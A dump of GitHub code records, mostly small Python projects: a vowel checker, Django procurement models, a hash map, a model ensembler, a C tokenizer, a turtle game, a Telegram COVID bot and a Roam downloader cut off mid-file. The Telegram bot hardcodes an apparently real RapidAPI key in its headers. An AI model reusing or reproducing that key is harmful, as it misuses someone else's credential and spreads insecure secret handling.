+{"seq_id":"3191418053","text":"n=input()\ns=['a','e','i','o','u']\ng=['A','E','I','O','U']\nl=[]\nm=[]\nk=[]\nfor i in n:\n if i in s:\n l.append(i)\n elif i in g:\n m.append(i)\nfor i in l:\n if i not in k and i in s:\n k.append(i)\nif len(k)==len(s):\n print(\"True\")\nelse:\n print(\"False\")\n \n \n \n ","repo_name":"Gopal-123/codemind-python","sub_path":"All_vowels_in_a_string.py","file_name":"All_vowels_in_a_string.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4112923278","text":"import datetime\n\nfrom django.db import models\nfrom django.utils import timezone\n\nchoices_etiqueta = (\n ('radio', 'Rádio'),\n ('telefonia', 'Telefonia'),\n ('audioevideo', 'Áudio e Vídeo'),\n ('outros', 'Outros')\n)\n\nchoices_nat = (\n ('material', 'Material'),\n ('servico', 'Serviço'),\n ('materialservico', 'Material/Serviço')\n)\n\nchoice_nat_desp = (\n ('custeio', 
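In the ResNet record above (result_of_all_layers.py), the top-5 classes are read out by sorting the full output vector and slicing; `torch.topk` expresses the same readout directly. A small sketch on a stand-in logits tensor (no pretrained model or class list assumed):

```python
import torch

logits = torch.randn(1, 1000)          # stand-in for the network's final output
probs = torch.nn.functional.softmax(logits, dim=1)[0] * 100  # percentages
top = torch.topk(probs, k=5)           # values and class indices, best first
for score, idx in zip(top.values, top.indices):
    print(f"class {idx.item()}: {score.item():.2f}%")
```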
'Custeio'),\n ('capital', 'Capital'),\n ('custeio/capital', 'Custeio/Capital')\n)\n\nchoice_status_receita = (\n ('adescentralizar', 'A descentralizar'),\n ('descentralizado', 'Descentralizado'),\n ('empenhado', 'Empenhado'),\n ('recolhido', 'Recolhido'),\n ('remanejado', 'Remanejado'),\n ('cancelado', 'Cancelado'),\n)\n\n\nclass Projeto(models.Model):\n\n titulo = models.CharField(max_length=100)\n responsavel = models.CharField(max_length=100, blank=True, null=True)\n descricao = models.TextField(blank=True, null=True)\n etiqueta = models.CharField(max_length=20, choices=choices_etiqueta)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.titulo\n\n\nclass HistoricoDocacaoOrcamentaria(models.Model):\n choice_acao = (\n ('env', 'envio'),\n ('aum', 'aumento'),\n ('red', 'redução'),\n ('reb', 'rebalanceamento')\n )\n acao = models.CharField(max_length=20, choices=choice_acao)\n detalhamento = models.TextField(blank=True, null=True)\n data_acao = models.DateField(blank=True, null=True)\n pacote_empenho = models.ForeignKey(\n 'DotacaoOrcamentaria', on_delete=models.CASCADE, related_name='historico_dotacoes_orcamentarias', null=True)\n\n def __str__(self):\n return self.elemento_item\n\n\nclass DotacaoOrcamentaria(models.Model):\n choices_origem = (\n ('CSM', '1400011 - CSM'),\n ('Aj-Geral', '1400005 - Aj-Geral'),\n ('ABM', '1400017 - ABM'),\n ('DLF', 'USDO 1400018 - DLF'),\n ('1ºBBM', '1400006 - 1ºBBM'),\n ('3ºBBM', '1400008 - 3ºBBM'),\n ('USDO GOL', '1400018 - USDO GOL'),\n ('4ºCOB', '1400034 - 4ºCOB'),\n ('BOA', '1400019 - BOA'),\n ('2ºCOB', '1400021 - 2ºCOB'),\n ('8ºBBM', '1400014 - 8ºBBM'),\n ('5ºBBM', '1400010 - 5ºBBM'),\n ('12ºBBM', '1400027 - 12ºBBM'),\n ('3ºCOB', '1400023 - 3ºCOB'),\n ('5ºCOB', '1400029 - 5ºCOB'),\n ('6ºCOB', '1400030 - 6ºCOB'),\n )\n acao = models.CharField(max_length=100, blank=True, null=True)\n fonte = models.CharField(max_length=100, blank=True, null=True)\n elemento_item = models.CharField(max_length=100, blank=True, null=True)\n conta = models.CharField(max_length=100, blank=True, null=True)\n data = models.DateField(blank=True, null=True)\n natureza_desp = models.CharField(\n max_length=20, choices=choice_nat_desp, blank=True, null=True)\n unid_origem = models.CharField(\n max_length=50, choices=choices_origem, blank=True, null=True)\n unid_destino = models.CharField(\n max_length=50, choices=choices_origem, blank=True, null=True)\n valor = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n doc_ref = models.CharField(max_length=100, blank=True, null=True)\n status = models.CharField(\n max_length=20, choices=choice_status_receita, blank=True, null=True)\n desc = models.TextField(blank=True, null=True)\n pacote_empenho = models.ForeignKey(\n 'PacoteEmpenho', on_delete=models.CASCADE, related_name='dotacoes_orcamentarias', null=True)\n\n def __str__(self):\n return str(self.valor)\n\n\nclass EquipamentoServico(models.Model):\n\n choices_sit = (\n ('ativo', 'Ativo'),\n ('inativo', 'Inativo'),\n ('suspenso', 'Suspenso')\n )\n choices_classe = (\n ('consumo', 'Consumo'),\n ('permanente', 'Permanente')\n )\n\n natureza = models.CharField(max_length=20, choices=choices_nat)\n titulo = models.CharField(max_length=100)\n especificacao = models.TextField(blank=True, null=True)\n registro_preco = models.CharField(max_length=10, blank=True, null=True)\n codigo_item = models.CharField(max_length=10, blank=True, null=True)\n elemento_item = 
models.CharField(max_length=8, blank=True, null=True)\n classe = models.CharField(max_length=10, choices=choices_classe)\n valor_portal = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n situacao = models.CharField(\n max_length=20, choices=choices_sit, blank=True, null=True)\n\n def __str__(self):\n return self.titulo\n\n\nclass Tasks_Cronograma(models.Model):\n choices_status = (\n ('pendente', 'Pendente'),\n ('emexecucao', 'Em execução'),\n ('concluido', 'Concluído')\n )\n choices_prioridade = (\n ('baixa', 'Baixa'),\n ('media', 'Média'),\n ('alta', 'Alta')\n )\n titulo = models.CharField(max_length=100)\n descricao = models.TextField()\n status = models.CharField(max_length=20, choices=choices_status)\n prioridade = models.CharField(max_length=20, choices=choices_prioridade)\n data_inicio_planejada = models.DateField(blank=True, null=True)\n data_fim_planejada = models.DateField(blank=True, null=True)\n data_inicio_real = models.DateField(blank=True, null=True)\n data_fim_real = models.DateField(blank=True, null=True)\n observacoes = models.TextField(blank=True, null=True)\n pacote = models.ForeignKey(\n 'PacoteAquisicao', on_delete=models.CASCADE, related_name='tasks', null=True)\n\n def __str__(self):\n return self.titulo\n\n def diferenca_de_dias(self):\n data_inicio_c = self.data_inicio_real if self.data_inicio_real else self.data_inicio_planejada\n data_fim_c = self.data_fim_real if self.data_fim_real else self.data_fim_planejada\n if data_inicio_c == '' or data_fim_c == '':\n return 0\n diff = data_fim_c - data_inicio_c\n\n return diff.days\n\n\nclass Orcamento(models.Model):\n empresa = models.CharField(max_length=100)\n data = models.DateField(blank=True, null=True)\n arquivos = models.CharField(max_length=100)\n\n def __str__(self):\n return self.empresa\n\n\nclass ObservacaoPendencia(models.Model):\n choices_categorias = (\n ('pendencia', 'Pendência'),\n ('observacao', 'Observação'),\n )\n choices_class = (\n ('aconcluir', 'A concluir'),\n ('concluido', 'Concluído'),\n )\n decricao = models.TextField(blank=True, null=True)\n categoria = models.CharField(max_length=20, choices=choices_categorias)\n data_obs_pend = models.DateField(blank=True, null=True)\n class_obs_pend = models.CharField(max_length=20, choices=choices_class)\n pacote_despesa = models.ForeignKey(\n 'PacoteAquisicao', on_delete=models.CASCADE, related_name='observacoes_pendencias', null=True)\n\n\nclass PacoteAquisicao(models.Model):\n\n choices_fase = (\n ('PJ', 'Planejamento'),\n ('RP', 'RP em andamento'),\n ('PG', 'PG em andamento'),\n ('EMP', 'Empenhado'),\n ('AGE', 'Aguardando entrega'),\n ('ENT', 'Entregue'),\n ('INS', 'Instalado')\n )\n\n choices_esp_fase = (\n ('rp-etp', 'Elaboração do ETP'),\n ('rp-orcamentos', 'Obtenção de Orçamentos'),\n ('rp-precos', 'Mapa de Preços'),\n ('rp-autorizacao-dlf', 'Pedido de autorização DLF'),\n ('rp-gestao', 'Solicitação de Gestão de RP'),\n ('rp-minuta', 'Elaboração Minuta do Termo de Referência'),\n ('rp-correcao-minuta', 'Correção Minuta do Termo de Referência (ASSJUR)'),\n ('rp-correcao-etp', 'Correção ETP (ASSJUR)'),\n ('rp-formulario-adesao', 'Formulário de Adesão'),\n ('rp-encaminhado-gol', 'Encaminhado a Gol'),\n ('rp-impugnacao', 'Respondendo impugnação'),\n ('rp-resposta-documentacao', 'Resposta a documentação'),\n ('pg-autorizacao-dlf', 'Pedido de autorização DLF'),\n ('pg-etp', 'Elaboração do ETP'),\n ('pg-orcamentos', 'Obtenção de Orçamentos'),\n ('pg-precos', 'Mapa de Preços'),\n ('pg-minuta', 'Elaboração Minuta do Termo de 
Referência'),\n ('pg-extrato', 'Extrato de Crédito'),\n ('pg-correcao-minuta', 'Correção Minuta do Termo de Referência (ASSJUR)'),\n ('pg-correcao-etp', 'Correção ETP (ASSJUR)'),\n ('Terceiros', 'Terceiros'),\n )\n\n titulo = models.CharField(max_length=100)\n status = models.CharField(\n max_length=100, choices=choices_fase, blank=True, null=True)\n fase = models.CharField(\n max_length=100, choices=choices_esp_fase, blank=True, null=True)\n etiqueta = models.CharField(\n max_length=20, choices=choices_etiqueta) # Vai vir via url\n natureza = models.CharField(max_length=20, choices=choices_nat)\n contrato = models.CharField(max_length=100, blank=True, null=True)\n contratoinit = models.DateField(blank=True, null=True)\n contratoend = models.DateField(blank=True, null=True)\n doc_ref = models.CharField(max_length=100, blank=True, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n projeto = models.ForeignKey(\n Projeto, on_delete=models.CASCADE, related_name='pacote_aquisicao')\n\n def __str__(self):\n return self.titulo\n\n\nclass PacoteAquisicaoEquipamentoServico(models.Model):\n\n choices_entrega_instalacao = (\n ('demanda', 'Demanda'),\n ('licitacao', 'Licitacao'),\n ('aentregar', 'A entregar'),\n ('entregue', 'Entregue'),\n ('ainstalar', 'A instalar'),\n ('instalado', 'Instalado')\n )\n pacoteaquisicao = models.ForeignKey(\n PacoteAquisicao, on_delete=models.CASCADE, related_name='aquisicao_equipamento')\n equipamento = models.ForeignKey(\n EquipamentoServico, on_delete=models.CASCADE, related_name='pacote_equipamento')\n valor_1 = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n valor_2 = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n valor_3 = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n valor_medio = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n usa_preco_portal = models.BooleanField(default=False)\n entrega_instalacao = models.CharField(\n max_length=20, choices=choices_entrega_instalacao)\n data_entrega = models.DateField(blank=True, null=True)\n data_instalacao = models.DateField(blank=True, null=True)\n observacoes = models.TextField(blank=True, null=True)\n local = models.CharField(max_length=100) # Define as per your needs\n destino = models.CharField(max_length=100) # Define as per your needs\n quantidade = models.IntegerField(default=1)\n\n def __str__(self):\n return self.equipamento.titulo\n\n\nclass PacoteEmpenho(models.Model):\n choices_tipo_pacote = (\n ('despesa', 'Despesa'),\n ('receita', 'Receita')\n )\n titulo = models.CharField(max_length=100)\n descricao = models.TextField(blank=True, null=True)\n etiqueta = models.CharField(\n max_length=20, choices=choices_etiqueta, blank=True, null=True)\n natureza = models.CharField(max_length=20, choices=choices_nat)\n tipo_pacote = models.CharField(\n max_length=20, choices=choices_tipo_pacote, blank=True, null=True)\n documento_ref = models.CharField(max_length=100, blank=True, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n projeto = models.ForeignKey(Projeto, on_delete=models.CASCADE, related_name='pacote_empenho')\n\n def __str__(self):\n return 
self.titulo\n","repo_name":"cleytonfs777/sdtsmanagerfull","sub_path":"projetos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11781,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"498026024","text":"from sys import stdin\n\nclass Node:\n def __init__(self, key, value, next):\n self.key = key\n self.value = value\n self.next = next\n\ndef my_hash(s):\n h = 0\n for c in s:\n h = (1_000_003 * h + ord(c)) % (2 ** 32)\n return h\n\nclass HashMap:\n def __init__(self):\n self.a = 5 * [None]\n self.count = 0\n \n def find(self, key):\n b = my_hash(key) % len(self.a)\n n = self.a[b]\n while n != None:\n if n.key == key:\n break\n n = n.next\n return n\n \n def insert(self, key, value):\n b = my_hash(key) % len(self.a)\n self.a[b] = Node(key, value, self.a[b]) # prepend\n \n def rehash(self):\n old = self.a\n self.a = (2 * len(self.a)) * [None]\n print(f'resizing to {len(self.a)} buckets')\n for head in old:\n n = head\n while n != None:\n self.insert(n.key, n.value)\n n = n.next\n \n def set(self, key, value):\n n = self.find(key)\n if n != None:\n n.value = value\n else:\n if self.count >= len(self.a) * 4:\n self.rehash()\n self.insert(key, value)\n self.count += 1\n \n def get(self, key):\n n = self.find(key)\n if n != None:\n return n.value\n else:\n return None\n \n def remove(self, key):\n b = my_hash(key) % len(self.a)\n if self.a[b] == None:\n return\n n = self.a[b]\n if n.key == key:\n self.a[b] = n.next\n return\n while n.next != None:\n if n.next.key == key:\n n.next = n.next.next\n self.count -= 1\n return\n n = n.next\n\nm = HashMap()\n\nwhile True:\n line = stdin.readline()\n if line.strip() == '== END ==':\n break\n word = ''\n for c in line:\n if 'a' <= c <= 'z' or 'A' <= c <= 'Z':\n word += c.lower()\n elif word:\n count = m.get(word)\n if count:\n m.set(word, count + 1)\n else:\n m.set(word, 1)\n word = ''\n\nprint('unique words =', m.count)\n\nfor line in stdin:\n word = line.strip()\n count = m.get(word)\n if count:\n print(word, count)\n m.remove(word)\n else:\n print(word, 'None')\n","repo_name":"nyhead/intro-to-algo-NPRG062","sub_path":"hash_table.py","file_name":"hash_table.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11603117987","text":"from enum import Enum\nimport models\nfrom fusion_strategies import BasicFusion, CompetenceFusion\n\n\nclass VoteMode(Enum):\n \"\"\"\n vote mode enumerate\n \"\"\"\n majority = 1\n one_vote_positive = 2\n one_vote_negative = 3\n average_score = 4\n max_score = 5\n competence_fusion = 6\n most_competence = 7\n highest_in_top_competences = 8\n\n\nclass Ensembler(object):\n \"\"\"\n the abstract class for ensemble learning\n \"\"\"\n def __init__(self):\n self._models = []\n self._model2weights = {}\n\n def add_model(self, prediction_model, weight=1):\n self._models.append(prediction_model)\n self._model2weights[prediction_model.id] = weight\n\n def adjust_severity_weight(self, outcome_severity, severity_conf):\n # normalise severity score\n m2s = {}\n max_score = 0\n for m in self._models:\n m2s[m.id] = severity_conf[m.outcome] / outcome_severity\n max_score = max(max_score, m2s[m.id])\n\n for m in self._models:\n self._model2weights[m.id] = (m2s[m.id] / max_score) * self._model2weights[m.id]\n\n def predict(self, x):\n models.PredictionModel.check_x(x)\n pass\n\n def predict_probs(self, x):\n pass\n\n @property\n def model2weight(self):\n return 
self._model2weights\n\n @property\n def models(self):\n return self._models\n\n\nclass BasicEnsembler(Ensembler):\n \"\"\"\n a basic ensembler implemented a set of fusion strategies\n \"\"\"\n def __init__(self):\n self._mode = VoteMode.one_vote_positive\n self._competence_assessor = None\n super(BasicEnsembler, self).__init__()\n\n @property\n def mode(self):\n return self._mode\n\n @mode.setter\n def mode(self, v):\n self._mode = v\n\n def get_competence_assessor(self):\n \"\"\"\n get competence assessor\n :return:\n \"\"\"\n if self._competence_assessor is None:\n self._competence_assessor = DistBasedAssessor(self.models)\n return self._competence_assessor\n\n def predict(self, x, threshold=0.5):\n \"\"\"\n predict binary output\n :param x: the data frame\n :param threshold: threshold for prob cut-off in models predicting probabilities\n :return:\n \"\"\"\n preds = []\n for m in self.models:\n dist = m.model_data['cohort_variable_distribution']\n di = models.DistributionImputator(dist)\n imputed_x = di.impute(x, variables=[k for k in dist])\n if self.mode in [VoteMode.average_score, VoteMode.max_score]:\n preds.append(m.predict_prob(imputed_x))\n else:\n preds.append(m.predict(imputed_x, threshold=threshold))\n if self.mode == VoteMode.majority:\n return BasicFusion.majority(preds)\n elif self.mode == VoteMode.one_vote_positive:\n return BasicFusion.one_vote(preds, positive=True)\n elif self.mode == VoteMode.average_score:\n return BasicFusion.score_fuse(preds, threshold=threshold)\n elif self.mode == VoteMode.max_score:\n return BasicFusion.score_fuse(preds, max_fuse=True, threshold=threshold)\n elif self.mode == VoteMode.competence_fusion:\n return CompetenceFusion.score_fuse_by_competence(x, preds, self.models,\n self.get_competence_assessor(), threshold=threshold)\n else:\n return BasicFusion.one_vote(preds, positive=False)\n\n def predict_probs(self, x):\n \"\"\"\n predict probabilities\n :param x: the data frame of data to be predicted\n :return:\n \"\"\"\n if self.mode not in [VoteMode.average_score, VoteMode.max_score, VoteMode.most_competence,\n VoteMode.competence_fusion, VoteMode.highest_in_top_competences]:\n raise Exception('only certain modes can predict probs')\n preds = []\n weights = []\n for m in self.models:\n dist = m.model_data['cohort_variable_distribution']\n di = models.DistributionImputator(dist)\n imputed_x = di.impute(x, variables=[k for k in dist])\n preds.append(m.predict_prob(imputed_x))\n weights.append(self.model2weight[m.id])\n use_max = self.mode == VoteMode.max_score\n if self.mode == VoteMode.competence_fusion:\n return CompetenceFusion.score_fuse_by_competence(x, preds, self.models,\n self.get_competence_assessor(),\n weight_by_competence=True,\n default_weights=weights)\n elif self.mode == VoteMode.most_competence:\n return CompetenceFusion.predict_by_most_competent(x, preds, self.models,\n self.get_competence_assessor())\n elif self.mode == VoteMode.highest_in_top_competences:\n return CompetenceFusion.predict_by_highest_risk(x, preds, self.models,\n self.get_competence_assessor())\n return BasicFusion.score_fuse(preds, max_fuse=use_max, use_score=True, weights=weights)\n\n\nclass PredictorCompetenceAssessor(object):\n \"\"\"\n an abstract competence assessor class\n \"\"\"\n def __init__(self, models):\n self._models = models\n self._default_model_index = None\n\n def default_selection(self):\n if self._default_model_index is None:\n lst = [(idx, self._models[idx].model_data['provenance']['derivation_cohort']['N'])\n for idx in 
range(len(self._models))]\n lst = sorted(lst, key=lambda t:-t[1])\n self._default_model_index = lst[0][0]\n return self._default_model_index, lst\n\n def evaluate(self, model, x):\n pass\n\n\nclass DistBasedAssessor(PredictorCompetenceAssessor):\n \"\"\"\n a competence assessor using distribution of deriviation cohort\n \"\"\"\n def __init__(self, models):\n super().__init__(models=models)\n\n def evaluate(self, model, x, var='age'):\n val = x[var]\n dist = model.model_data['cohort_variable_distribution']\n m_var = dist[var]['median']\n var_range = dist[var]['h25'] - dist[var]['l25']\n delta = 0 if dist[var]['l25'] <= val <= dist[var]['h25'] else min(abs(val - m_var) / var_range, 1)\n # delta = abs(val - m_var) / var_range\n competence = 1 - delta\n return competence\n","repo_name":"Honghan/EnsemblePrediction","sub_path":"model_ensemble.py","file_name":"model_ensemble.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"69975224252","text":"import re\nimport streamlit as st\nimport pandas as pd\n\nclass CTokenizer:\n def __init__(self):\n # Define keywords and punctuators\n self.keywords = [\n 'auto', 'break', 'case', 'char', 'const', 'continue', 'default', 'do',\n 'double', 'else', 'enum', 'extern', 'float', 'for', 'goto', 'if', 'int',\n 'long', 'register', 'return', 'short', 'signed', 'sizeof', 'static',\n 'struct', 'switch', 'typedef', 'union', 'unsigned', 'void', 'volatile',\n 'while'\n ]\n self.punctuators = [\n '{', '}', '[', ']', '(', ')', '.', '->', '++', '--', '&', '*', '+', '-',\n '~', '!', '/', '%', '<<', '>>', '<', '>', '<=', '>=', '==', '!=', '^',\n '|', '&&', '||', '?', ':', ';', '...', '=', '*=', '/=', '%=', '+=', '-=',\n '<<=', '>>=', '&=', '^=', '|=', ','\n ]\n\n # Build the regular expression patterns\n self.keyword_pattern = r'\\b(?:{})\\b'.format('|'.join(map(re.escape, self.keywords)))\n self.identifier_pattern = r'\\b([a-zA-Z_][a-zA-Z0-9_]*)\\b'\n self.constant_pattern = r'\\b([0-9]+)\\b'\n self.string_literal_pattern = r'\"([^\"\\\\]*(?:\\\\.[^\"\\\\]*)*)\"'\n self.punctuator_pattern = r'({})'.format('|'.join(map(re.escape, self.punctuators)))\n\n def tokenize_c_program(self, c_program):\n tokens = []\n # Remove comments by replacing them with whitespace\n c_program = re.sub(r'(\\/\\*[\\s\\S]*?\\*\\/|\\/\\/.*)', lambda m: ' ' * len(m.group()), c_program)\n \n # Tokenize the program\n patterns = [\n (self.keyword_pattern, 'KEYWORD'),\n (self.identifier_pattern, 'IDENTIFIER'),\n (self.constant_pattern, 'CONSTANT'),\n (self.string_literal_pattern, 'STRING_LITERAL'),\n (self.punctuator_pattern, 'PUNCTUATOR')\n ]\n \n for pattern, token_type in patterns:\n for match in re.finditer(pattern, c_program):\n tokens.append({'Type': token_type, 'Value': match.group()})\n \n return tokens\n\n\n\ndef main():\n st.title(\"C Tokenizer\")\n uploaded_file = st.file_uploader(\"Upload a .c file\", type=[\"c\"])\n\n if uploaded_file is not None:\n c_program = uploaded_file.read().decode(\"utf-8\")\n tokenizer = CTokenizer()\n tokens = tokenizer.tokenize_c_program(c_program)\n st.header(\"Tokens\")\n df = pd.DataFrame(tokens)\n st.dataframe(df)\n if st.button(\"Export Tokens\"):\n export_data = df.to_string(index=False)\n export_filename = \"c_tokens.txt\"\n st.download_button(\n label=\"Download Tokens\",\n data=export_data,\n file_name=export_filename,\n mime=\"text/plain\"\n )\n\n\nif __name__ == '__main__':\n 
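In the ensemble record above, `BasicFusion.score_fuse` is imported from `fusion_strategies` rather than defined, so its body is not shown. Given how `predict_probs` calls it (per-model probability arrays plus optional weights and a `max_fuse` flag), a plausible sketch, not the actual library code, is:

```python
import numpy as np

def score_fuse(preds, weights=None, max_fuse=False):
    """Fuse per-model probability arrays (hypothetical sketch, not the library code)."""
    preds = np.asarray(preds)                      # shape: (n_models, n_samples)
    if max_fuse:
        return preds.max(axis=0)                   # take the highest score per sample
    w = np.ones(len(preds)) if weights is None else np.asarray(weights, dtype=float)
    return (preds * w[:, None]).sum(axis=0) / w.sum()  # weighted average

print(score_fuse([[0.2, 0.9], [0.6, 0.7]], weights=[1, 3]))
```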
main()\n","repo_name":"tanishpatel0106/LLM_Code_Vulnerabilty","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25674790371","text":"from turtle import Turtle, Screen\nimport random\n\nrace_is_on = False\nscreen = Screen()\nscreen.screensize(500, 500)\nmichy = Turtle()\nraph = Turtle()\nleo = Turtle()\ndonny = Turtle()\nmichy.color(\"Orange\")\nraph.color(\"Red\")\nleo.color(\"Blue\")\ndonny.color(\"Indigo\")\nturtle_dict = {\"Michy\": michy, \"Raph\": raph, \"Leo\": leo, \"Donny\": donny}\nuser_bet = Screen().textinput(title=\"Place your bet\", prompt=\"Select one of them (Michy/Raph/Leo/Donny): \")\nif user_bet.lower() == \"michy\" or user_bet.lower() == \"raph\" or user_bet.lower() == \"leo\" or user_bet.lower() == \"donny\":\n race_is_on = True\nelse:\n print(\"Invalid Input\")\n\n\ndef turtle_pos(t, x, y):\n t.shape(\"turtle\")\n t.speed(0)\n t.hideturtle()\n t.penup()\n t.setpos(x, y)\n t.showturtle()\n\n\n# def check_bet():\n# if user_bet:\n# # print(f\"{keys} won the race!\")\n# return False\n# else:\n# return True\n\n\nturtle_pos(michy, -300, 200)\nturtle_pos(raph, -300, 50)\nturtle_pos(leo, -300, -100)\nturtle_pos(donny, -300, -250)\n# print(michy.xcor())\n\nwhile race_is_on:\n for key, value in turtle_dict.items():\n if value.xcor() >= 300:\n race_is_on = False\n if key.lower() == user_bet.lower():\n print(\"You have won the bet!\")\n else:\n print(\"You have lost the bet.\")\n print(f\"{key} won the race.\")\n value.forward(random.randrange(0, 10))\n # check_finish_line(turtle_dict)\n\nscreen.exitonclick()\n","repo_name":"ErfanDipto/Python_Projects","sub_path":"Turtle_Race(Day_19)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23677920110","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\n \nplt.style.use('default')\nsns.set()\nsns.set_style('whitegrid')\nsns.set_palette('Set1')\n\n#x = np.array([0, 2, 4, 6, 8, 10])\nscore_list1 = [0.3, 1.2, 1.3, 1.8, 1.7, 1.5]\nscore_list2 = [2.1, 2.4, 2.3, 2.1, 2.2, 2.1, 33]\ngene_1 = np.array(score_list1)\ngene_2 = np.array(score_list2)\n\n# plot graph\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\n# plot\n#ax.plot(x, gene_1, label='player1(left)')\n#ax.plot(x, gene_2, label='player2(right)')\nax.plot(gene_1, label='player1(left)')\nax.plot(gene_2, label='player2(right)')\n# set label\nax.legend()\nax.set_xlabel(\"time[sec]\")\nax.set_ylabel(\"score\")\n# set ylim\nmax_score = max(max(score_list1), max(score_list2))\nmax_score = (max_score+1)//1 # clip\nax.set_ylim(0, max_score)\n# show\nplt.show()\n","repo_name":"seigot/tools","sub_path":"tetris/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"32316107289","text":"import http.client\r\nimport re\r\nimport telebot\r\nimport config\r\ndef maindata():\r\n conn = http.client.HTTPSConnection(\"vaccovid-coronavirus-vaccine-and-treatment-tracker.p.rapidapi.com\")\r\n headers = {\r\n 'x-rapidapi-key': \"06a132a9bbmsh4b2b32d05bbd0d5p1615f3jsn5cc43401ee3c\",\r\n 'x-rapidapi-host': \"vaccovid-coronavirus-vaccine-and-treatment-tracker.p.rapidapi.com\"\r\n }\r\n conn.request(\"GET\", 
\"/api/npm-covid-data/europe\", headers=headers)\r\n res = conn.getresponse()\r\n data = res.read()\r\n data1 = data.decode(\"utf-8\")\r\n return data1\r\ndef getcases(st):\r\n data1 = maindata()\r\n if data1.find(st) != -1 and st != '':\r\n country = re.search(st, data1)\r\n pochcontr = country.start()\r\n data = data1[pochcontr:]\r\n cases = re.search('TotalCases', data)\r\n poch = cases.start()\r\n res = ''\r\n allres = ''\r\n s1 = True\r\n i = 0\r\n while s1 == True:\r\n if (data[i + poch] == ':'):\r\n i += 1\r\n while True:\r\n if data[i + poch] == ',':\r\n s1 = False\r\n break\r\n res += data[i + poch]\r\n i += 1\r\n allres = st + ' total cases: ' + res\r\n i += 1\r\n\r\n else:\r\n allres = 'incorrect data'\r\n return allres\r\nbot = telebot.TeleBot(config.TOKEN)\r\n@bot.message_handler(commands=['start'])\r\ndef a(message):\r\n bot.send_message(message.chat.id,'/help - справка')\r\n@bot.message_handler(commands=['give5'])\r\ndef a(message):\r\n bot.send_message(message.chat.id,getcases('France') + '\\n' + getcases('Russia') + '\\n' + getcases('UK') + '\\n' + getcases('Italy') + '\\n' + getcases('Hungary'))\r\n text = '\\n'+getcases('France') + '\\n' + getcases('Russia') + '\\n' + getcases('UK') + '\\n' + getcases('Italy') + '\\n' + getcases('Hungary')\r\n file=open('info.txt','a')\r\n file.write(text)\r\n file.close()\r\n@bot.message_handler(commands=['help'])\r\ndef a(message):\r\n bot.send_message(message.chat.id, '/give5 - 5 країн\\nдля пошуку окремих країн, надішліть мені назву країни з великої букви на англійській\\n/save - створення файлу з історією\\n/removedata - стирає історію')\r\n@bot.message_handler(commands=['save'])\r\ndef a(message):\r\n file=open('info.txt','rb')\r\n bot.send_document(message.chat.id, file)\r\n@bot.message_handler(commands=['removedata'])\r\ndef a(message):\r\n file = open('info.txt', 'w')\r\n file.write(' ')\r\n file.close()\r\n bot.send_message(message.chat.id,'видалено')\r\n@bot.message_handler(content_types=['text'])\r\ndef a(message):\r\n mes = message.text\r\n if getcases(mes)!='incorrect data':\r\n bot.send_message(message.chat.id,getcases(mes))\r\n text='\\n'+getcases(mes)\r\n file=open('info.txt','a')\r\n file.write(text)\r\n file.close()\r\n else:\r\n bot.send_message(message.chat.id, 'невірні дані')\r\nbot.polling(none_stop=True)\r\n\r\n\r\n\r\n","repo_name":"Boryslavsky/prak","sub_path":"task4/prak5.py","file_name":"prak5.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8458298100","text":"\"\"\"\nDownloads and parses some public databases from `https://github.com/br-g/roam-public-db`.\nParsing is done using my new Python package: pyroaman (https://github.com/br-g/pyroaman).\n\nIf you think some other databases should be added, please suggest it on Slack or\ncreate a Github issue.\n\"\"\"\n\nfrom typing import Iterator, Dict\nimport tempfile\nimport shutil\nfrom datetime import datetime\nfrom pathlib import Path\nfrom six.moves import urllib\nimport pytz\nfrom loguru import logger\nimport click\nfrom tqdm import tqdm\nimport pyroaman\nfrom roam_sanity.util import save_as_json\n\n\nDATABASES = [\n 'help',\n 'roamhacker',\n]\n\nparsing_time = datetime.now().astimezone(pytz.utc).isoformat()\n\n\ndef download_database(db_id: str) -> pyroaman.database:\n url = f'https://raw.githubusercontent.com/br-g/roam-public-db/main/json/{db_id}.json'\n dirpath = Path(tempfile.mkdtemp())\n filepath = dirpath / 'db.json'\n\n 
